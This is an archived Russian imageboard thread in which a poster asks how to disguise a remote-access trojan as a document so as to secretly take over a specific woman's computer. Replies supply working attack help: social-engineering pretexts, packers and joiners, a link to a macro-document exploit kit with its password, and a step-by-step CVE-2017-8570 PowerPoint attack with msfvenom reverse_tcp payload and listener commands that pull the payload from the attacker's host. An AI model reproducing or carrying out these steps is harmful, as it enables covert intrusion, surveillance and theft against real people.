24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!
ЗДРАВЫ БУДЬДЕ. На связи самый успешный хакер этого тысячелетия. Призываю в тред не менее великих и охуевших хакеров...
Суть такова. Есть днарьский RAT-ник(не самый днарьский - не выдает присутствия при активации доступа. Устанавливается скрыто и за 1 секунду). Который при активации дает доступ к пеке... Ну например ЕОТ. Всё рабочее. Всё проверено. Но есть одно но. Единственное что не в состоянии постигнуть мой разум = это то как Убедительно замоскировать этот Rat-ник... ну скажем... под вордовский документ/картинку. Да что угодно кроме EXE Во всяких Питонах я не силён. Нагуглил только кучу троянов которые могут менять местами расширение с названием или что то подобное делать... Но это же лажа. Даже если и тня не шарит - элементарные exe может додуматься не открывать.Иконку сменить вообше не проблема, Но это же всё равно подозрительно Ебся/Ебся я короче - хуй. Он по прежнему остается EXE-шником. И например через ВК - его уже не скинешь.
Взываю о помощи к вам. Волхвы взлома! Сущности киберПОДПРОСТРАНСТВЕННЫХ ПУСТОТ! Знаете ли вы как можно грамотно и без регистрации и смс сменть расширение файла, что бы тот не потерял свою исполняемую функцию? Простыми словами - как из ЕХЕ сделать что то иное. Но что бы он в душе остался ЕХЕ и установился при запуске?
Помогайте господа! Помогайте! Если проблему решим - поделюсь. ТАВО РОТ ОТВЕЧАЮ Он позволяет свободно гулять по чьей угодно пеке и забирать оттуда всё что вздумается
>>166028300 Макрос сможет незаметно запустить файл из системы, но файл должен быть в системе. Плюс в настройках экселя должно стоять что макросы запускаются автоматически. Ну или как-то сделать какую-то открытку на макросе, что б для тян не был подозрительным его запуск. Не знаю сможет ли макрос запустить exeшник, если у него расширение jpeg к примеру...
>>166028300 на самом деле я б не ипал мозги, и тупо соц инженерию подрубил. пишешь с фейка --> убеждаешь еот шо ты молодой девелопер, и она подходит под целевую аудиторию для теста твоей новой проги --> она скачивает с тентакля yobaniypithon.228 и меняет расширение на .exe и тестит --> ??? ---> PROFIT!
>>166028581 В принципе, в visual studio можно сделать открытку - экзешник. Ну то есть взять 10-20 картинок, засунуть их внутрь файла, сделать из этого какую-нибудь поздравлялку, что бы подозрения убрать. А в неё встроить запуск файла из системы.
>>166029182 Позволь нести этот крест мне самостоятельно. Ты молодец конечно - но ведь ты едвал ли сможешь меня переубедить. Мой распад как личности в этом плане зашел уже достаточно далеко. Я уже давно прошел Point no return.
>>166027779 (OP) Ребята не стоит вскрывать этот код. Вы молодые, хакеры, вам все легко. Это не то. Это не Stuxnet и даже не шпионские программы ЦРУ. Сюда лучше не лезть. Серьезно, любой из вас будет жалеть. Лучше закройте компилятор и забудьте что там писалось. Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.
>>166027779 (OP) Не обращай внимание на идиотов, которым трудно поверить, что кроме двача может быть что то еще интересно. Все это очень большая тема, в которой ты можешь придумать все что угодно. Были бы знания. Лично я просто подрубил СИ. Все ищут хорошую работу, особенно красивые тян, которые образование провертели на пизде. Вот и толкайся от этого. "вы все еще ищите работу? Давайте мы отправим вам форму заполнения резюме, а в понедельник встретимся. и тд" можешь даже позвонить и спросить почту. Придумать что нибудь умное и затереть. А ютубе полно гайдов как склеить какой нибудь ворд+ратник. Это не саымй лучший способ. но зато простой.
>>166027779 (OP) ОП, братишка, все что знал тебе кидаю: > Сжимаем наш файл при помощи Upx или MPress. Их вы можете найти в сети. > После этого уже скомпилированный файл соединить с билдом и dll с первого пункта. Соединить можно при помощи sfx архива или джоинера.
Еще погугли на линукс есть специальные проги которые могут скомпилить ехе+ворд / ехе+повер поинт. Вот только я долбаеб и мне нет прощения и я проебал ссылки.
А вот ОП, то что тебе нужно: Ворд: Всем привет, сегодня я вам расскажу как спрятать ратник или любой другой вирус в документ Word. Суть в том, что в роли вредоноса будет выступать .doc файл с включенными макросами. Если жертва запустит наш документ, то вы получите полный доступ к её компьютеру. Итак, давайте начнем. -Для начала собираем наш ратник и криптуем его. - Запускаем программу для склейки, добавляем в картинки наше предупреждение (есть в архиве). - Выбираем верхний пункт слева, нажимаем "GENERATE EXPLOIT FILE" и ставим наш закриптованный билд. Выскакивает предупреждение, жмем "ОК", далее выскакивает сообщение об успешном создании файла.
Наш файл готов и теперь можно распространять его под видом чего-либо. Архив с необходимым софтом - https://yadi.sk/d/c0hkJG-e3J3Vfa. Пароль от архива - docsploit.
Поверпоинт: Дoпустим, вам нужно взломать свoего друга, учителя или партнера, подсунуть ему исполняемый файл (exe) сложновато. И тут на помощь приходит Kali Linux с новым обновлением metasploit, который поможет склеить презентацию с вирусом. Что нам понадобиться: 1. Kali linux. 2. Metasploit. 3. Знания базовых команд Linux.
1. Для начала скачаем сам эксплоит командой "git clone GitHub - tezukanice/Office8570: CVE20178570". 2. Переходим в папку "cd Office8570". 3. Для успешной генерации ppsx фaйла, нужно создать папку "template" в директории Office8570. Пишем "mkdir template". Переносим файл template.ppsx "cp template.ppsx template/" 4. Дaлее нужно создать сaм .ppsx файл при помощи команды "python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://вашip/logo.doc". 5. Фaйл презентации мы сделaли, нo в него нужно вшить вирус. Создадим сaм PayLoad "msfvenom -p windows/meterpreter/reverse_tcp LHOST=вашip LPORT=4444 -f exe > /tmp/shell.exe" 6. Запускаем слушатель. Oн соoбщает и получает управление когда жертва открыла файл. Пишем "msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST вашip; set LPORT 4444; run" 7. Вирус и слушатель готовы. Нужно запустить сaм эксплоит-сервер "python cve-2017-8570_toolkit.py -M exp -e http://вашip/shell.exe -l /tmp/shell.exe".
Когда жертва открывает презентацию, то начинает скачиваться наш вирус, и после этого автoматически запускает егo. Когда этo произойдет, в кoнсoли откроется сессия и вы смoжете управлять компьютером жертвы.
>>166027779 (OP) Проиграл с этого мамкиного хакера. Закриптовать вирус и склеить его беспалева с другим файлом – самая сложная часть работы. А скачать ратник с античата может любой.
https://vk .com / doc64104647 _ 443433841 - В документах в ВК есть. Вот пожалуйста. Только компилятором почту свою сделайте в нём и всё. Вся инфа на канале овербафера есть.
>>166029416 Оп, если это реально еот, то не надо, это реально плохая затея, один хуй ты ей это расскажешь рано или поздно и тогда 99%, что проебёшь её. прям как я, о чём до сих пор жалею, хотя прошло 12 лет, а потом ещё 5 лет назад я снова её проебать умудрился.
>>166040513 Но так как ты молодой и самый умный, вот тебе ещё способ - залезь в вайвай сетку и там если расшарено всё, то долезь до рабочего стола и сделай ярлык чтоб запускал одновременно и тебя и ту хуйню.
На связи самый успешный хакер этого тысячелетия.
Призываю в тред не менее великих и охуевших хакеров...
Суть такова. Есть днарьский RAT-ник(не самый днарьский - не выдает присутствия при активации доступа. Устанавливается скрыто и за 1 секунду). Который при активации дает доступ к пеке... Ну например ЕОТ.
Всё рабочее. Всё проверено. Но есть одно но. Единственное что не в состоянии постигнуть мой разум = это то как
Убедительно замоскировать этот Rat-ник... ну скажем... под вордовский документ/картинку. Да что угодно кроме EXE
Во всяких Питонах я не силён.
Нагуглил только кучу троянов которые могут менять местами расширение с названием или что то подобное делать... Но это же лажа. Даже если и тня не шарит - элементарные exe может додуматься не открывать.Иконку сменить вообше не проблема, Но это же всё равно подозрительно
Ебся/Ебся я короче - хуй. Он по прежнему остается EXE-шником. И например через ВК - его уже не скинешь.
Взываю о помощи к вам. Волхвы взлома! Сущности киберПОДПРОСТРАНСТВЕННЫХ ПУСТОТ!
Знаете ли вы как можно грамотно и без регистрации и смс сменть расширение файла, что бы тот не потерял свою исполняемую функцию?
Простыми словами - как из ЕХЕ сделать что то иное. Но что бы он в душе остался ЕХЕ и установился при запуске?